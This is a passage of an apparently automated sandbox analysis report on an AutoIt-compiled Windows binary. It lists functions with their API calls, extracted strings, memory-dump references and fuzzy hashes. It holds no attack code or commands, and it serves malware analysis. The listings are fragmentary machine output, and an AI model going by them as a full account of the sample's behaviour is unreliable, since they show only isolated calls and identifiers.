                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 003B9699
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003B96A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: 1de8b662ee21886881966be32a6a6f896e8d110cd90a40f22d556d22faa38c18
                                                                  • Instruction ID: 545dcbc9081e31f685e3e695dcac7bc56e9db28b09cdb7bf6b959195226a53f7
                                                                  • Opcode Fuzzy Hash: 1de8b662ee21886881966be32a6a6f896e8d110cd90a40f22d556d22faa38c18
                                                                  • Instruction Fuzzy Hash: 4F118871500108AAEB125F68AC40BEB3B6EEB09378F514326FB24965E0C7319C509B60
                                                                  Function 00395262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003952D5
                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003952F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 249501f8a4e580636a4acd794e0155116606d89fbde6ff38d92024650ff3dce5
                                                                  • Instruction ID: 0270e51e1bebe965c25614da56c6d2162fb4142155ab27357f72cd77768e8a8c
                                                                  • Opcode Fuzzy Hash: 249501f8a4e580636a4acd794e0155116606d89fbde6ff38d92024650ff3dce5
                                                                  • Instruction Fuzzy Hash: F211E676901614ABDF23DBA8ED84B9D77B8AB06750F168025E981E72A0D3B0ED84C790
                                                                  Function 003A4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003A4DF5
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003A4E1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: fded934d0b39b2532bdcfcec841b2fd375610102157b561f3afd628e22dd42ed
                                                                  • Instruction ID: 11df90cdab35c06aec4eff44b3f2420424b57d7471d245c13805853726e25211
                                                                  • Opcode Fuzzy Hash: fded934d0b39b2532bdcfcec841b2fd375610102157b561f3afd628e22dd42ed
                                                                  • Instruction Fuzzy Hash: 26115A70501221BADB2A8F618899EEBFBACFF97755F20822AF51596540D2B05941C6E0
                                                                  Function 0037A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003837A7
                                                                  • ___raise_securityfailure.LIBCMT ref: 0038388E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                  • String ID: (A
                                                                  • API String ID: 3761405300-2104148225
                                                                  • Opcode ID: dab07726ff10f15ddad627f02a974ace5046b8b1bb7e598ba4d2da0a4836f58a
                                                                  • Instruction ID: 54b6f04e08f369dbed2b6b1b8ca47a36158a8651ec4896db56ca2854100b0d09
                                                                  • Opcode Fuzzy Hash: dab07726ff10f15ddad627f02a974ace5046b8b1bb7e598ba4d2da0a4836f58a
                                                                  • Instruction Fuzzy Hash: 1F21EFB5510308DAE741DF56FA966843BB5BB48310F10D87AE9088A3A0E3F4A9D0CB4D
                                                                  Function 003AA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 003AA88B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: htonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 3832099526-2422070025
                                                                  • Opcode ID: 6b86a52fb5937cf7ff0946669aa452ad031b32b0f8739c8e9549ca863f3af838
                                                                  • Instruction ID: 346da0356f0a745fe9c5e69bf72c35cc5238672a70de8eaf228f686ccfa6c26a
                                                                  • Opcode Fuzzy Hash: 6b86a52fb5937cf7ff0946669aa452ad031b32b0f8739c8e9549ca863f3af838
                                                                  • Instruction Fuzzy Hash: AA014536200304ABCB12AF68C886FADBB6CEF06310F10846BF512AB2D1C775E801C752
                                                                  Function 0038B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0038B7EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 96a37487ba37bb2b00751a6fd5df91cd34bf214d0f7be17c580bbce93b1279ba
                                                                  • Instruction ID: 0d3244c9469310fe25d185d3f3aca2e3975555bb68ccde057dc7e3695ce34171
                                                                  • Opcode Fuzzy Hash: 96a37487ba37bb2b00751a6fd5df91cd34bf214d0f7be17c580bbce93b1279ba
                                                                  • Instruction Fuzzy Hash: 9701F171650315AFCB06FBA4CC52DFEB36DAF06314B10061AF8626B2D2EBB459088B90
                                                                  Function 0038B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0038B6EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: b30089619e52dcaf478273e19b259a853c8783c3133efb02b7e5bb15b2eb7e2c
                                                                  • Instruction ID: 4a436d5f3fa773c636b6c38a802a48a47bcddb428d5536f674d794ef78e64954
                                                                  • Opcode Fuzzy Hash: b30089619e52dcaf478273e19b259a853c8783c3133efb02b7e5bb15b2eb7e2c
                                                                  • Instruction Fuzzy Hash: 800184716412056FCB06FBA4C953FFEB3AC9B05345F10006AB402772D1EB945E1887A5
                                                                  Function 0038B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 0038B76C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: b1d1ec63d8495eec81076091fe45177a917eb110e4feff1b1367fe66960b82fc
                                                                  • Instruction ID: 909c510243cf6c21a779e3fa91ad3518c6dad5662750683793bdd14b292b4fb3
                                                                  • Opcode Fuzzy Hash: b1d1ec63d8495eec81076091fe45177a917eb110e4feff1b1367fe66960b82fc
                                                                  • Instruction Fuzzy Hash: 0B01A271641305ABCB02F7A4CA13FFEB3AC9F05345F50002AB801B71E2DBA45E0987B5
                                                                  Function 00374D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: "A
                                                                  • API String ID: 3494438863-1113105338
                                                                  • Opcode ID: 364ee3aff3ea527ab6b326c6dcfcb017f4c2b5aef94e5a1048640e1377c02c0c
                                                                  • Instruction ID: 8816099162daf91d1b9d69747e6f50a0a381c0475f55cbf19b46d50abe7dfcd5
                                                                  • Opcode Fuzzy Hash: 364ee3aff3ea527ab6b326c6dcfcb017f4c2b5aef94e5a1048640e1377c02c0c
                                                                  • Instruction Fuzzy Hash: 4DF028302087028EE3368F18BD416AA67D4E701720F10C17BF208DE186E7BCD851479C
                                                                  Function 00354024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00350000,00000063,00000001,00000010,00000010,00000000), ref: 00354048
                                                                  • EnumResourceNamesW.KERNEL32(00000000,0000000E,003967E9,00000063,00000000,75A50280,?,?,00353EE1,?,?,000000FF), ref: 003C41B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: EnumImageLoadNamesResource
                                                                  • String ID: >5
                                                                  • API String ID: 1578290342-4081535938
                                                                  • Opcode ID: 79a7300a09632e30fc89b0ba560d05cc52c82ed2ea3026259ac007d84383fad2
                                                                  • Instruction ID: 522366c239e12fd221530eb7f2b8d938aebe7b98a38b6fa398881fe607d8d0fd
                                                                  • Opcode Fuzzy Hash: 79a7300a09632e30fc89b0ba560d05cc52c82ed2ea3026259ac007d84383fad2
                                                                  • Instruction Fuzzy Hash: F3F06D31A41325B7E6214B1ABC4AFD67FADA709BB5F108516F714AB1F0D2F095808A98
                                                                  Function 00397744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: 18df445991bc8b6c200514d1d991284914ea61688964dde163324ad989a323b3
                                                                  • Instruction ID: 52f59a2b5c0ccc6acf1b1f198a1dd7724f77a3bf9958800b281e5848cd3ebd5e
                                                                  • Opcode Fuzzy Hash: 18df445991bc8b6c200514d1d991284914ea61688964dde163324ad989a323b3
                                                                  • Instruction Fuzzy Hash: BEE0223360022827DB20EBA9AC09FC7FBACEB91B60F000026B904E3081D670E60087E8
                                                                  Function 0038A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0038A63F
                                                                    • Part of subcall function 003713F1: _doexit.LIBCMT ref: 003713FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: 037fcc292433bfccd74c6b74554e61f7df7a6dfe1f0f0908e072e823f4d6c846
                                                                  • Instruction ID: 6cd767c6ed86069e238fa0c34942203cf857ca83d0b0ef4b93ca783dde994e02
                                                                  • Opcode Fuzzy Hash: 037fcc292433bfccd74c6b74554e61f7df7a6dfe1f0f0908e072e823f4d6c846
                                                                  • Instruction Fuzzy Hash: D0D012323C572836D21636997C1BFD5764C8B15B51F144026FB0CA95D259E6994042D9
                                                                  Function 003CAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 003CACC0
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003CAEBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 510247158-3257408948
                                                                  • Opcode ID: 74a4cb22e3f2e4787cd3e62c85437719f396c9ed05fce17a06d9eaea0b44c74a
                                                                  • Instruction ID: 56871dca07436ef6ac1e58af42e3da02f6bb6b73ba120645c46d50790c3e07f2
                                                                  • Opcode Fuzzy Hash: 74a4cb22e3f2e4787cd3e62c85437719f396c9ed05fce17a06d9eaea0b44c74a
                                                                  • Instruction Fuzzy Hash: 5FE0C970C04909AFCB12DBA9D944EECB7BCAB48709F14C09AE112F2560DB705E84DF26
                                                                  Function 003B8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B86A2
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003B86B5
                                                                    • Part of subcall function 00397A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: b0fbd46193ea9d539b3ddb4eeb633fae597e72fc2033186160c839e0e1a55bca
                                                                  • Instruction ID: 545b7b7621b65ca7db5a5aeba497f5ce9e69c60a8a31c29e4e1acedddbefba6f
                                                                  • Opcode Fuzzy Hash: b0fbd46193ea9d539b3ddb4eeb633fae597e72fc2033186160c839e0e1a55bca
                                                                  • Instruction Fuzzy Hash: 22D01231395314B7E6696770BC0BFCA7F1C9B04B22F100816B749AA1D0C9F4E940C758
                                                                  Function 003B86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B86E2
                                                                  • PostMessageW.USER32(00000000), ref: 003B86E9
                                                                    • Part of subcall function 00397A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: a9b55ad9ae396ef7f7caff07deeeb9fcfb32799cc0f85804ed57e20819d24533
                                                                  • Instruction ID: c96781e313debca0af79fb1b8e14a767df39e9a6fbefc130e1c638144de957e4
                                                                  • Opcode Fuzzy Hash: a9b55ad9ae396ef7f7caff07deeeb9fcfb32799cc0f85804ed57e20819d24533
                                                                  • Instruction Fuzzy Hash: CBD012313863147BF66A6770BC0BFCA7B1C9B05B22F500816B745EA1D0C9F4E940C758